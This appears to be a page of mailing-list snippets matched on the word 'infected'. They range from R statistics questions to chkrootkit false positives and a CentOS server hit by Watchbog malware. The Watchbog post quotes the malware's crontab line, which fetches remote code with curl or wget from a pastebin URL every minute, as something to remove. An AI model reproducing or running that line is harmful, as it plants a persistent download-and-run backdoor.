ggplot2 reorder factors for faceting
Dear List I am trying to draw a heatmap using ggplot2. In this heatmap I have faceted my data by 'infection' of which I have four. These four infections break down into two types and I would like to reorder the 'infection' column of my data to reflect this. Toy example below: library(ggplot2) # test data for ggplot reordering genes <- (rep (c(rep('a',4), rep('b',4), rep...

Hacked or not ?
Hi, I have a 4.9-STABLE FreeBSD box apparently hacked! Yesterday I ran chkrootkit-0.41 and I don't like some of the outputs. Those are: chfn ... INFECTED chsh ... INFECTED date ... INFECTED ls ... INFECTED ps ... INFECTED But all the rest is NOT PROMISC, NOT INFECTED, NOTHING FOUND, NOTHING DELETED, or NOTHING DETECTED. I know by the FreeBSD-Security archives that

...s - the data looks like we would expect. Gene expression is lowest in the infected/not vaccinated group, then next lowest is the infected/vaccinated group and finally comes the uninfected/not vaccinated group. So the working hypothesis is that gene expression of the gene in question is lowered by infection, but that the vaccine somehow alleviates this effect, but not as much as to the level of a totally uninfected subject. We *might* have access to data relating to uninfected/vaccinated group, my pet scientist is digging for this as we speak. As for lesions, well none of the uninfected subjects hav...

chfn, date, chsh INFECTED according to chkrootkit
I ran chkrootkit ( v. chkrootkit-0.43 ) earlier and noticed that chfn, date, and chsh showed as being infected. I remember reading post from the past that right now chkrootkit is giving alot of false positives, so I suspected that these 3 binaries are not bad. However, to be on the safe side, I deleted the 3 binaries, removed /usr/src and did a 'make world' to 4.10-STABLE. But, chfn,

Linux virus
ugh :) Today I became infected with the bliss virus, any info on this would be appreciated! How do I scan for files infected and is it possible to remove it? I first noticed the infection when running a program (not as root) messages flashed on the screen about transversing directories and such. The program (gimp) had been working fine since I downloaded the binary for gimp from their main site. The gimp people told me they have not been receiving complaints their binaries are inf...

post-delivery virus scan
I have discovered that many times the virus definitions I use for scanning messages (ClamAV, with the unofficial signatures http://sanesecurity.com/usage/linux-scripts/) are updated some time after my server has received an infected email. It seems the virus creators are trying to race the virus definition creators to see who can deliver first; more than half of the infected messages are found

Unknown rootkit causes compromised servers
Here is the applicable article: http://www.linux.com/feature/125548 There are links in the above article that explain tests for the system and what is currently known about the rootkit. Apparently initial access is NOT via any vulnerability but just guessed root passwords. There are currently 2 methods to see if you are infected: 1. In some cases, the root kit causes you to not be able to

chkrootkit and 4.10-prerelease issues?
Has anyone else seen chkrootkit (version 0.43) on 4.10-prerelease or later report chfn, chsh, and date as infected? I built world yesterday, and my nightly chkrootkit reports this on run. I've replaced the binaries with their 4.9 equivalents, and things don't report as infected. I upgrade the 4.9 machine to 4.10, and chkrootkit reports them as infected again. Is this similar to the

question about survival datas with repeated mesurements
I have to study censured datas concernig the occurence of infection at the point of insertion of catheter in patients with renal disease. Catheter may be removed for ather reasons than infection, in this case, the observation is censored. Each has exactly 2 observations. The question are the pronostic factors of infection (the other variables are; age, sex, type of...

Anova - interpretation of the interaction term
...infected | uninfected, and vaccinated | unvaccinated (the two factors). We're measuring expression of a gene. Graphically, in the infected group, vaccination makes expression go up. In the uninfected group, vaccination makes expression go down. In both the vaccinated and unvaccinated groups, infection makes expression go down, but it goes down further in unvaccinated than it does in vaccinated. So from a statistical point of view, I can see exactly why the interaction term is significant, but what my colleage wants to know is that WITHIN the vaccinated group, does infection decrease expression...

CentOS 7.5 Linux box got infected with Watchbog malware
Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently i am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps and is done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget

CentOS 7.5 Linux box got infected with Watchbog malware
...tchbog > kill -9 pidof watchbog > > Any suggestions or recommendations to find out how CentOS 7.5 Linux box got > infected with Watchbog Malware. Well, if the infected crontab is owned by user 'apigee' then it would suggest that whatever runs as that user is the source of the infection. The malware appears to try to elevate its privs, and if it's successful it modifies various system files. What you are seeing in the 'apigee' crontab is just the tip of the iceberg. It is unlikely that what is in that blog will successfully get rid of all the malware - it will probab...
